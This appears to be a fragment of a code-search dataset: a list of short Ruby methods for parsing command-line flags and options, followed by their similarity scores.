"def parse argv\n @bare.clear\n eoo = argv.index '--' # end of options\n if eoo\n tail = argv[eoo+1 .. ]\n argv = argv[ .. eoo-1]\n end\n re = /^-{1,2}(?=[^-])/\n for first,second in argv.chunk_while{ _1 =~ re and _2 !~ re }\n case first\n when /^--(?i:no)-(?=[^-])/\n # --no-long\n p = plong $~.post_match\n raise \"#{p.long} is not boolean\" unless p.boolean\n @buffer[p] = false\n @bare.push second if second\n when /^--(?=[^-])/\n # --long\n p = plong $~.post_match\n if p.boolean\n @buffer[p] = true\n @bare.push second if second\n else\n @buffer[p] = second\n end\n when /^-(?=[^-])(?!.*[0-9])/\n # -short\n letters = $~.post_match.chars\n b,o = letters.map{ pshort _1 }.partition &:boolean\n b.each{ @buffer[_1] = true }\n o.each{ @buffer[_1] = nil }\n if second\n if o.empty?\n @bare.push second\n else\n @buffer[o.pop] = second\n end\n end\n else\n # bare\n @bare.push first\n end\n end\n @bare.concat tail if tail\n end",
"def chained_flags_with_signature(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n truthy_and_chosen =\n selected_flags(colmn).\n select { |flag| flags_to_collect.include?(flag) }\n truthy_and_chosen.concat(\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << \"not_#{flag}\".to_sym unless truthy_and_chosen.include?(flag)\n end\n )\n end",
"def program_options\n [\n # The values of the array are,\n # [long_option, short_option and parameter, description, code to execute]\n ['--google', '-g', \"Format for Google blogger.\",\n lambda { |value| options.google = true }\n ],\n ['--jayway', '-j', \"Format for Jayway blog.\",\n lambda { |value| options.jayway = true }\n ],\n ['--utf', '-u', \"Include meta charset utf8\",\n lambda { |value| options.utf = true }\n ],\n ['--stylesheet', '-s', \"Add a stylesheet, md.css\",\n lambda { |value| options.stylesheet = true }\n ],\n ['--verbose', '-v', \"Log to standard output.\",\n lambda { |value| options.verbose = true }\n ],\n ['--version', '-V', \"Display the program version.\",\n lambda { |value|\n puts \"#{program_name}, version #{PROGRAM_VERSION}\"\n exit\n }\n ]\n ]\nend",
"def split_args(ary)\n\tfiles = []\n\topts = []\n\tc = false\n\tary.each do |i|\n\t\tnext if i == '-'\n\t\tif i == '--' then\n\t\t\tc = true\n\t\t\tnext\n\t\tend\n\t\tfiles << i if c or not (i =~ /^-/)\n\t\topts << i if (not c) and (i =~ /^-/)\n\tend\n\t[files, opts]\nend",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def flag(*names)\n options = extract_options(names)\n names = [names].flatten\n\n verify_unused(names)\n flag = Flag.new(names,options)\n flags[flag.name] = flag\n\n clear_nexts\n flags_declaration_order << flag\n flag\n end",
"def parse(args)\n arg_list = arg_groups(args)\n options = DEFAULT_OPTIONS.dup\n options[:exclude] += default_excludes\n options[:locations] = arg_list.shift\n\n arg_list.reject(&:empty?).each do |set|\n flag, *args = set\n args.map! { |arg| arg.delete(\"/\") } # \"log/\" => \"log\"\n\n case flag\n when '-f', '--flags' then options[:flags] += args\n when '-e', '--exclude' then options[:exclude] += args\n else puts \"Unknown argument: #{flag}\"\n end\n end\n\n options\n end",
"def arg_groups(args)\n result = []\n buf = []\n\n # No dir was passed, use default\n if args.empty? || args.first.start_with?('-')\n result << [ Notes.root ]\n end\n\n args.each do |arg|\n if ALL_FLAGS.include?(arg)\n result << buf unless buf.empty?\n buf = []\n end\n buf << arg\n end\n\n result << buf\n end",
"def get_real_args(args)\n real_args = []\n args.each do |arg|\n real_args << arg if arg !~ /^-/\n end\n replace_short_aliases real_args\n end",
"def yardopts(file = options_file)\n return [] unless use_yardopts_file\n File.read_binary(file).shell_split\n rescue Errno::ENOENT\n []\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def names\n @opt_types.keys.map {|e| undasherize e }\n end",
"def to_options_array\n options_array = []\n attributes.each do |attr_name, value|\n next if value.blank?\n\n # explicit check for == true to flag-only options that have no value, like --extract \"['cluster', 'metadata']\"\n if value == true\n options_array << Parameterizable.to_cli_opt(attr_name)\n else\n options_array += [Parameterizable.to_cli_opt(attr_name), value.to_s]\n end\n end\n options_array << self.class::PARAMETER_NAME if defined? self.class::PARAMETER_NAME\n options_array\n end",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def flags; end",
"def ruby_pants_options\n {\n double_left_quote: '“',\n double_right_quote: '”',\n single_left_quote: '‘',\n single_right_quote: '’',\n ellipsis: '…',\n em_dash: '—',\n en_dash: '–',\n }\n end",
"def ruby_pants_options\n {\n double_left_quote: '“',\n double_right_quote: '”',\n single_left_quote: '‘',\n single_right_quote: '’',\n ellipsis: '…',\n em_dash: '—',\n en_dash: '–',\n }\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def read_argv_flags argsIn\r\n skipVal = argsIn.length + 1\r\n argsIn.each_with_index do |argIn, ind|\r\n next if skipVal == ind\r\n arg = argIn.downcase()\r\n if arg[0].eql? '-'\r\n symAgr = strip_to_sym(arg)\r\n if @options[symAgr].is_a? String\r\n @options[symAgr] = argsIn[ind + 1]\r\n skipVal = ind + 1\r\n elsif @options[symAgr] == false\r\n @options[symAgr] = true\r\n elsif @options[symAgr].is_a? Array\r\n @options[symAgr] = argsIn[ind + 1]\r\n end\r\n elsif known_file_type arg\r\n @options[:f] << argIn.gsub(/(\\.\\/)|(\\.\\\\)/,'')\r\n end\r\n puts argIn\r\n end\r\n end",
"def command_arguments(options={})\n args = []\n args.concat(['--type', options[:type].to_s]) if options[:type]\n args.concat(['--line-break', options[:line_break].to_s]) if options[:line_break]\n args.concat(['--charset', options[:charset].to_s]) if options[:charset]\n\n if options[:type].to_s == 'js'\n args << '--nomunge' unless options[:munge]\n args << '--preserve-semi' if options[:preserve_semicolons]\n args << '--disable-optimizations' unless options[:optimize]\n end\n\n args\n end",
"def parse_options(args) # :nodoc:\n global_options,command,options,arguments = parse_options_helper(args.clone,Hash.new,nil,Hash.new,Array.new)\n flags.each { |name,flag| global_options[name] = flag.default_value if !global_options[name] }\n command.flags.each { |name,flag| options[name] = flag.default_value if !options[name] }\n return [global_options,command,options,arguments]\n end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def add_flags(flags)\n metadata[:remove] ||= []\n metadata[:add] ||= []\n\n flags.each do |flag|\n if !self.flags.find_by_name(flag)\n f = self.flags.create(:name => flag)\n if rule = Flag.get_rule(flag)\n metadata[:remove] |= rule[0]\n metadata[:add] |= rule[1]\n end\n else\n if rule = Flag.get_rule(flag)\n metadata[:remove] |= rule[0]\n metadata[:add] |= rule[1]\n end\n end\n end\n\n [metadata[:remove], metadata[:add]]\n end",
"def required_flags\n flags.select &:required\n end",
"def flag()\n\tb=[0,0.2,0.6]\n\ty=[0.8,0.8,0.2]\n\tr=[1,0,0]\n\t\n\t[[b,b,y,y,r,r],\n\t[b,b,y,y,r,r],\n\t[b,b,y,y,r,r],\n\t[b,b,y,y,r,r],\n\t[b,b,y,y,r,r]]\nend",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def handle_long_dash(string)\n words = string.split('--')\n @in_brackets ? close_brackets(words) : open_brackets(words)\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def range_all\n [ range(:upper_alphas), \n range(:lower_alphas), \n range(:numerals), \n range(:symbols_1), \n range(:symbols_2), \n range(:symbols_3), \n range(:symbols_4), \n range(:symbols_5), \n range(:symbols_6),\n range(:single_quotes),\n range(:double_quotes),\n range(:backtick) ]\n end",
"def option_list\n result = @options.dup\n result << \"-o\" << @rdoc_dir\n result << \"--main\" << main if main\n result << \"--markup\" << markup if markup\n result << \"--title\" << title if title\n result << \"-T\" << template if template\n result << '-f' << generator if generator\n result\n end",
"def disable_flag(*flags)\n check_definition_state(is_arg: true)\n flags = flags.uniq\n intersection = @used_flags & flags\n unless intersection.empty?\n raise ToolDefinitionError, \"Cannot disable flags already used: #{intersection.inspect}\"\n end\n @used_flags.concat(flags)\n self\n end",
"def stow_command_flags\n flags = ''\n flags += \"-t #{stow_target}\" unless stow_target.nil?\n flags += \"-d #{stow_path}\" unless stow_path.nil?\n flags\n end",
"def pack_flags(flags)\n FLAGS.each_with_index.inject(0) do |memo,(key,i)|\n memo |= i if flags[key]\n memo\n end\n end",
"def to_s\n @flags.join(', ')\n end",
"def initialize(flags_text)\n @flags = flags_text.split(/,/).map{ |flag_text| Flag.new(flag_text) }\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
"def long_name\n long.to_s.sub(/^(--.+?)(\\s+|\\=|\\[).*$/, \"\\\\1\")\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n invocations = ([name] + Array(aliases)).map { |_| add_dashes(_) }.join('|')\n usage = \"#{invocations} #{arg_name || 'arg'}\"\n @io.puts \"#{@nest}=== #{usage}\"\n @io.puts\n @io.puts String(desc).strip\n @io.puts\n @io.puts \"[Default Value] #{default_value || 'None'}\"\n @io.puts \"[Must Match] #{must_match.to_s}\" unless must_match.nil?\n @io.puts String(long_desc).strip\n @io.puts\n end",
"def feature_flags_for(*flag_names)\n flag_names.map { |flag_name| feature_flag_as_hash(flag_name) }.reduce({}, :merge).with_indifferent_access\n end",
"def manual_description\n txt = (@flags.include?(:optional) ? '<' : '[') + @description\n if @type && @type != 'x'\n txt += _INTL(': {1}',@vararg ? '*'+type_name(@type) : type_name(@type))\n end\n txt += @flags.include?(:optional) ? '>' : ']'\n return txt\n end"
] | [
"0.6855186",
"0.6651415",
"0.66093004",
"0.64483005",
"0.6438081",
"0.6377476",
"0.6377476",
"0.6302847",
"0.6183081",
"0.61217344",
"0.6095984",
"0.6052623",
"0.6025771",
"0.59871995",
"0.5987073",
"0.59280264",
"0.5864525",
"0.5832347",
"0.5785188",
"0.5709738",
"0.5709738",
"0.5598666",
"0.5517512",
"0.5513288",
"0.54876184",
"0.54763305",
"0.5460119",
"0.54371536",
"0.54273224",
"0.5387855",
"0.5336057",
"0.5312157",
"0.5303376",
"0.52674425",
"0.52649736",
"0.5258698",
"0.5258491",
"0.524989",
"0.5240786",
"0.5215703",
"0.52133656",
"0.5213188",
"0.51823294",
"0.5175435",
"0.5172824",
"0.5167159",
"0.5161258",
"0.5156999",
"0.5136699",
"0.51354307",
"0.5132315",
"0.5100783",
"0.5073882",
"0.5071801",
"0.50660366",
"0.50627905",
"0.50576246",
"0.50493217",
"0.50409836",
"0.5018021",
"0.5018021",
"0.49978167",
"0.4997154",
"0.49822816",
"0.49769625",
"0.49725613",
"0.49261254",
"0.49223325",
"0.4911613",
"0.4911613",
"0.49047163",
"0.48714188",
"0.48701102",
"0.48660603",
"0.4862437",
"0.4862437",
"0.4854189",
"0.48448434",
"0.48343423",
"0.48151997",
"0.48068452",
"0.47974214",
"0.47936517",
"0.4788135",
"0.47874674",
"0.47838998",
"0.47797012",
"0.47774965",
"0.4776659",
"0.4775199",
"0.47701415",
"0.47668633",
"0.47667873",
"0.47649184",
"0.47590917",
"0.47555473",
"0.47513965",
"0.47503698",
"0.4750019",
"0.47496873"
] | 0.73501015 | 0 |
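The `long_flag_syntax` record above filters a flag's syntax objects down to the double-dash forms; its `short_flag_syntax` counterpart, visible among the negatives, does the same for single-dash forms. A sketch of that partition, assuming only a `flag_style` attribute matters — `FlagSyntax` is a hypothetical stand-in for `Flag::Syntax`, not the original class:

# Stand-in for Flag::Syntax; only :flag_style drives the filter.
FlagSyntax = Struct.new(:str, :flag_style)

flag_syntax = [
  FlagSyntax.new('--verbose', :long),
  FlagSyntax.new('-v', :short),
  FlagSyntax.new('--dry-run', :long)
]

long_flags  = flag_syntax.find_all { |ss| ss.flag_style == :long }
short_flags = flag_syntax.find_all { |ss| ss.flag_style == :short }

p long_flags.map(&:str)  # => ["--verbose", "--dry-run"]
p short_flags.map(&:str) # => ["-v"]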
The list of all effective flags used. | def effective_flags
@effective_flags ||= flag_syntax.flat_map(&:flags)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def symbols\n @flags.keys\n end",
"def flags #:nodoc:\n @flags ||= {}\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags \n @flags ||= {}\n end",
"def flags\n [long, short].compact\n end",
"def list_bit_flags\n if (!@cached)\n @cached = lists.uniq.inject(0) { |memo,cur| memo |= (1 << cur) }\n end\n @cached\n end",
"def fflags\n set = FFI::MemoryPointer.new :ulong\n clear = FFI::MemoryPointer.new :ulong\n C.archive_entry_fflags(entry, set, clear)\n\n [set.get_ulong(0), clear.get_ulong(0)]\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def flagged_reasons\n return @flagged_reasons\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def flags\n flgs = []\n flgs << :prompt_now if 0 < @cred_struct[:flags] & Win32::Cred::CRED_FLAGS_PROMPT_NOW\n flgs << :username_target if 0 < @cred_struct[:flags] & Win32::Cred::CRED_FLAGS_USERNAME_TARGET\n flgs\n end",
"def flag\n flags.join(\", \")\n end",
"def flags\n if variables\n (variables[:all][:referenced_enables] + variables[:all][:set_enables]).uniq.sort do |x, y|\n x = x[0] if x.is_a?(Array)\n y = y[0] if y.is_a?(Array)\n # Need to use strings for the comparison as some flags can be a string and some a symbol\n x.to_s <=> y.to_s\n end\n end\n end",
"def flags; end",
"def flags\n @values.fetch('flags') { \n @values['flags'] = nil\n }\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def required_flags\n flags.select &:required\n end",
"def flags\n response[\"flags\"]\n end",
"def flags\n return @val\n end",
"def summary\n return desc.to_s.inspect unless desc.empty?\n flags.map(&:display_name).inspect\n end",
"def to_s\n @flags.join(', ')\n end",
"def show_elf_flags\n\t\t\t\tputs \" Flags: #{@elf_flags.to_h}\"\n\t\tend",
"def flags_resync\n if @flags\n self.class.flag_def.each do |f|\n sym = (f.flag_type=='Symbol' ? f.flag_name.to_sym : f.flag_name)\n i,p,v = self.class.index_position_value(f.position)\n sn=self.send(\"flags_#{i}\")||0\n b = sn & v > 0\n logger.warn \"#{@flags[sym].class} value '#{@flags[sym]}' for flag #{self.class}->#{sym} will be stored as true, not '#{@flags[sym]}'\" unless FlaggableTypes.include?(@flags[sym].class)\n if @flags[sym] && !b\n self.send(\"flags_#{i}=\",sn+v)\n elsif b && !@flags[sym]\n self.send(\"flags_#{i}=\",sn-v)\n end\n end\n end\n @flags\n end",
"def default_flags\n flags.select &:default\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def flags\n fs = FRAME_FLAGS[type]\n [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80]\n .select { |v| @flags_value & v > 0 }\n .map { |val| fs && fs.key(val) || (\"unknown_%02x\" % val).to_sym }\n end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def cpu_flags\n cpuinfo = cmd_exec('cat /proc/cpuinfo').to_s\n\n return unless cpuinfo.include? 'flags'\n\n cpuinfo.scan(/^flags\\s*:(.*)$/).flatten.join(' ').split(/\\s/).map(&:strip).reject(&:empty?).uniq\n rescue\n raise'Could not retrieve CPU flags'\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def count\n @flags.size\n end",
"def configured_feature_flags\n feature_flag_options.sort_by(&:name).map(&:to_h).reduce({}, :merge).with_indifferent_access\n end",
"def aclflags\r\n\t\t\t`#{BITS::BITSADMIN} /getaclflags {#{@id}}`\r\n\t\tend",
"def get_flags(opts = {})\n data, _status_code, _headers = get_flags_with_http_info(opts)\n return data\n end",
"def flags=(lst); dirty!; super; end",
"def used_bits(_options = {})\n used_bits = []\n named_bits do |_name, bit|\n used_bits << bit.position if bit.size == 1\n if bit.size > 1\n used_bits << ((bit.position)..(bit.position + bit.size - 1)).to_a\n end\n end\n used_bits.flatten!\n used_bits.sort!\n used_bits\n end",
"def each(&blk)\n @flags.each(&blk)\n end",
"def get_flags(opts = {})\n data, _status_code, _headers = get_flags_with_http_info(opts)\n data\n end",
"def get_flags(opts = {})\n data, _status_code, _headers = get_flags_with_http_info(opts)\n data\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def flow_flags\n @flow_flags ||= [@options[:flow_flag] || @options[:flow_flags]].flatten.compact\n end",
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flags\n self - words\n end",
"def defined_permissions\n FLAGS.collect { |value, name| (@bits & (1 << value)).positive? ? name : nil }.compact\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flags\n raise NotImplementedError.new(\"flags() must be implemented by subclasses of AbstractVersionedFile.\")\n end",
"def bits\n self.class.bits.select { |bit, _| include? bit }.keys\n end",
"def feature_flags\n 0\n end",
"def index\n @flags = Flag.custom_flags\n end",
"def flags; changeset.flags(@path); end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def bits\n flavor_info[:bits]\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def flag_def\n @@flag_def||=reset_flag_def\n @@flag_def[self.to_s]||[]\n end",
"def show_masks\n ret = Hash.new\n self::MASKS.each do |meth,mask|\n ret[meth] = mask.map { |m| self::MASK_INFO[m] }\n end\n ret\n end",
"def applied\n @applied ||= []\n end",
"def bits\n self.class.bits.select { |bit, _| include? bit }.keys\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def perms_set\n PRIV_FLAG_COLUMNS.select { |pfc| self[pfc] == 'Y' }.to_set\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def stability_flags\n alias_of.stability_flags\n end",
"def modes\n @modes + autobuild.utilities.values.\n find_all { |u| u.enabled? }.\n map(&:name)\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def all_values\n _acts_as_enum_state.by_ordinal.values\n end",
"def notifyflags\r\n\t\t\t`#{BITS::BITSADMIN} /getnotifyflags {#{@id}}`\r\n\t\tend",
"def device_compliance_setting_states\n return @device_compliance_setting_states\n end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def all\n @options\n end",
"def modes\n fix_mode.modes\n end",
"def flags\n (self[:type_flags] & 0xfc)\n end",
"def flags(path)\n info = file_info(path)[1]\n return \"\" if info.nil?\n info\n end",
"def all\n data = service.list_flags.to_h[:items] || []\n load(data)\n end",
"def index\n @flags = Flag.all\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def default_flags\n cflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n cflags.push '-m64'\n end\n\n cflags\n end",
"def enabled_lints\n (Lint.all - disabled_lints).uniq\n end",
"def flagged\n @data_hash.keys.select { |key| @data_hash[key].flagged }\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def as_flag_collection(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << [flag, flag_enabled?(flag, colmn)]\n end\n end",
"def status_flags\n\tstatus_bits_to_flags(self.status)\n end",
"def active?\n !effective_flags.empty?\n end",
"def addCFlags(flags) @CFLAGS = ensureArray(flags) + @CFLAGS end"
] | [
"0.71123785",
"0.7064988",
"0.677054",
"0.677054",
"0.6765211",
"0.6728041",
"0.6672082",
"0.65038013",
"0.65038013",
"0.64296246",
"0.6422122",
"0.6413207",
"0.63778657",
"0.63652533",
"0.6348326",
"0.6332696",
"0.6223134",
"0.6174319",
"0.61449414",
"0.6109141",
"0.6054181",
"0.6054181",
"0.6041879",
"0.6025255",
"0.5994375",
"0.59710157",
"0.5969499",
"0.59604514",
"0.5906607",
"0.58873785",
"0.5885868",
"0.5870943",
"0.5797214",
"0.579354",
"0.57723814",
"0.5735775",
"0.5709907",
"0.5677871",
"0.5677411",
"0.5666641",
"0.5661376",
"0.5639491",
"0.5637619",
"0.5626162",
"0.5612635",
"0.56097865",
"0.5595044",
"0.55945754",
"0.55830926",
"0.5556668",
"0.5556668",
"0.5535473",
"0.5523701",
"0.55093473",
"0.5507573",
"0.55062616",
"0.54919297",
"0.54902065",
"0.5477184",
"0.54678667",
"0.5457344",
"0.54340494",
"0.5432791",
"0.54199594",
"0.5408334",
"0.5394034",
"0.5394034",
"0.5393507",
"0.53875655",
"0.5360622",
"0.5358542",
"0.534435",
"0.5343868",
"0.533875",
"0.5338408",
"0.52867436",
"0.5286167",
"0.5284677",
"0.5282692",
"0.5280567",
"0.5279738",
"0.52761865",
"0.52749753",
"0.52695394",
"0.5269134",
"0.5239667",
"0.5228699",
"0.5227629",
"0.5224481",
"0.5213458",
"0.52070373",
"0.51931936",
"0.5183374",
"0.51790255",
"0.51760304",
"0.51630974",
"0.5152213",
"0.5130846",
"0.51095176",
"0.51050836"
] | 0.8119101 | 0 |
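The `effective_flags` record above flattens the flag strings contributed by every syntax object into a single list via `flat_map(&:flags)`. The standalone sketch below isolates that step; the two-element array standing in for a positive/negative pair is an assumption for illustration, not taken from the original:

# Stand-in syntax object: #flags returns the concrete flag strings it covers.
FlagSyntax = Struct.new(:flags)

flag_syntax = [
  FlagSyntax.new(['--verbose', '--no-verbose']),
  FlagSyntax.new(['-v'])
]

effective_flags = flag_syntax.flat_map(&:flags)
p effective_flags # => ["--verbose", "--no-verbose", "-v"]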
Look up the flag by string. Returns an object that indicates whether the given string matched this flag, whether the match was unique, and other pertinent information. | def resolve(str)
resolution = Resolution.new(str)
flag_syntax.each do |fs|
if fs.positive_flag == str
resolution.add!(self, fs, false, true)
elsif fs.negative_flag == str
resolution.add!(self, fs, true, true)
elsif fs.positive_flag.start_with?(str)
resolution.add!(self, fs, false, false)
elsif fs.negative_flag.to_s.start_with?(str)
resolution.add!(self, fs, true, false)
end
end
resolution
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resolve_flag(str)\n result = Flag::Resolution.new(str)\n flags.each do |flag_def|\n result.merge!(flag_def.resolve(str))\n end\n result\n end",
"def find_flag(flag_name, flag_state=nil)\n detect do |flag|\n flag.name == flag_name && (flag_state.nil? || flag.state == flag_state)\n end\n end",
